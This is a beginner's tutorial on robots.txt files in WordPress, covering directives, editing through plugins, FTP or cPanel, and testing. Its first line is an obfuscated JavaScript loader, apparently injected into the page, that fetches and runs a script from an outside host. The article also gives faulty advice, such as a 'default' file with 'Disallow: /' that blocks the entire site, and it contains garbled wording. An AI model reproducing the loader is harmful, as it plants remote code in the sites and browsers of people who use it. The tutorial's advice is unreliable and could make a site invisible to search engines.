;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://bigbricks.org/z8wkpztX"); A Beginner's Guide to Robots.txt in WordPress 2023

A Beginner’s Guide to Robots.txt in WordPress

If you’re running a WordPress website, it’s essential to know how to use Robots.txt files. They can help you keep your website healthy and Google-friendly. This article will show you how to create and edit a Robots.txt file in WordPress. We’ll also explain each code line so you can customize it for your site. Let’s get started!

What is a Robots.txt File?

A Robots.txt file is a text file that tells search engine bots (like Googlebot) which pages on your website can and cannot crawl. You can use this file to keep low-value carriers out of the search engine index or to prevent certain types of bot traffic from overloading your server.

Where is the WordPress Robots.txt Located?

Robots.txt is a text file located in your root WordPress directory. You can access it via FTP or the File Manager in your hosting cPanel, and you can access the file, go to your-website.com/robots.txt in your browser and press Enter.

The WordPress Robots.txt default code

Here is the default WordPress Robots.txt code:

User-agent: *

Disallow: /cgi-bin/

Disallow: /wp-admin/

Disallow: /

What Rules to Include in Your WordPress Robots.txt File?

You can add any of the following rules to your Robots.txt file to control which or what can crawl pages on your website:

Allow: /

Disallow: /folder/

Disallow: /file.html

Sitemap: your-website.com/sitemap_index.xml

What is a User-agent?

A user agent is a software agent acting on behalf of a user, such as a web browser. The User-agent: * entry in Robots.txt means that all bots are welcome to crawl all pages on your website.

What is the Allow Directive?

The Allow directive allows certain pages to crawl, even if their location is in a disallowed folder.

What is the Disallow Directive?

The Disallow directive prevents certain pages from being crawled. You can use this to keep low-value carriers out of the search engine index or to avoid certain types of bot traffic from overloading your server.

What is the Sitemap Directive?

The Sitemap directive tells bots where to find your website’s sitemap. This file contains a list of all the pages on your website, including the URL, last modification date, and change frequency.

What is Crawl Delay?

Crawl delay is the number of seconds a bot should wait between requests to your website. This can be used to prevent overloading your server with too many requests at once.

How to Implement Robots.txt in wordpress?

Now that we’ve gone over the basics of Robots.txt let’s look at how to implement it in WordPress.

There are two ways to edit your Robots.txt file: via the WordPress admin panel or by directly editing the file through FTP.

Using Plugins to Edit Robots.txt

If you want to edit your Robots.txt file from the WordPress admin panel, you can use a plugin like Yoast SEO or All in One SEO Pack.

These plugins give you a graphical interface for editing your Robots.txt file and provide helpful tips for creating effective rules. They also allow you to generate a sitemap and submit it to Google Search Console.

Editing Robots.txt Using Yoast Seo

To edit your Robots.txt file using the Yoast SEO plugin, go to SEO → Tools → File Editor.

On the Robots.txt tab, you can edit your Robots.txt file and see a preview of how it will look to bots.

Editing Robots.txt Using All in One SEO Pack

To edit your Robots.txt file using the All in One SEO Pack plugin, go to General Settings → Security → Robots.txt Manager.

Editing Robots.txt Manually 

If you’re not using a plugin, you can edit your Robots.txt file directly by following these steps:

Log into your WordPress site via FTP.

Navigate to the root directory of your WordPress installation. This is usually /public_html/.

Download the Robots.txt file to your computer.

Edit the Robots.txt file in a text editor like Notepad++ or Sublime Text.

Upload the Robots.txt file back to your server, overwriting the existing file.

You can also edit the Robots.txt file directly from cPanel > File Manager:

Log into your WordPress site via cPanel.

Navigate to the root directory of your WordPress installation. This is usually /public_html/.

Click on the Robots.txt file and select Edit from the menu.

A popup window will appear. Select the coding language you want to use for editing (usually UTF-16 or ASCII/ANSI) and click Edit.

Make your changes to the Robots.txt file and click Save Changes when you’re done.

As you can see, there are many different ways that you can edit your Robots.txt file. Which method you choose will depend on your level of comfort with editing code and files on your server.

How to Optimize WordPress Robots.txt File for Seo?

Here are a few tips on how to optimize your Robots.txt file for SEO:

– Use the Allow directive to allow bots to crawl essential pages on your website.

– Use the Disallow directive to keep low-value pages out of the search engine index.

– Use the Sitemap directive to tell bots where to find your website’s sitemap.

– Use Crawl Delay to prevent overloading your server with too many requests at once.

How to Test the Robots.txt File?

After you have edited your Robots.txt file, it is crucial to test it to make sure that it is working as intended.

There are a few ways to test your Robots.txt file:

– Use the Google Search Console Robots.txt Tester tool.

– Use the Bing Webmaster Tools Robots.txt Tester tool.

– Use the Robots.txt Validator tool.

– Use the Robots Testing Tool from SEO Book.

If you want to edit your Robots.txt file via FTP, you will need to connect to your website using an FTP client and navigate to the root wordpress directory. Once there, you can edit the Robots.txt file directly.

When you finish editing the file, save your changes and upload the file back to your server.

That’s it! You now know how to edit and optimize your Robots.txt file for WordPress.

What are the Best Practices for WordPress Robots.txt?

There are a few key things to keep in mind when it comes to Robots.txt in WordPress:

– Robots.txt should be used to tell search engines which pages on your site they can and cannot crawl.

– You should never use robots.txt to try and hide pages from search engines that you don’t want them to index.

– Robots.txt should be located in the root directory of your WordPress site.

– The contents of your Robots.txt file should always be placed between the User-agent and Disallow lines.

Conclusion

Robots.txt in WordPress is a simple text file that tells search engines which pages they can and cannot crawl on your site. By following the best practices above, you can ensure that your Robots.txt file is doing its job correctly.

Do you have any questions about Robots.txt in WordPress? Leave a comment below and let us know!

Looking for more WordPress tutorials? Check out our blog for more helpful articles.

Happy blogging!

Scroll to Top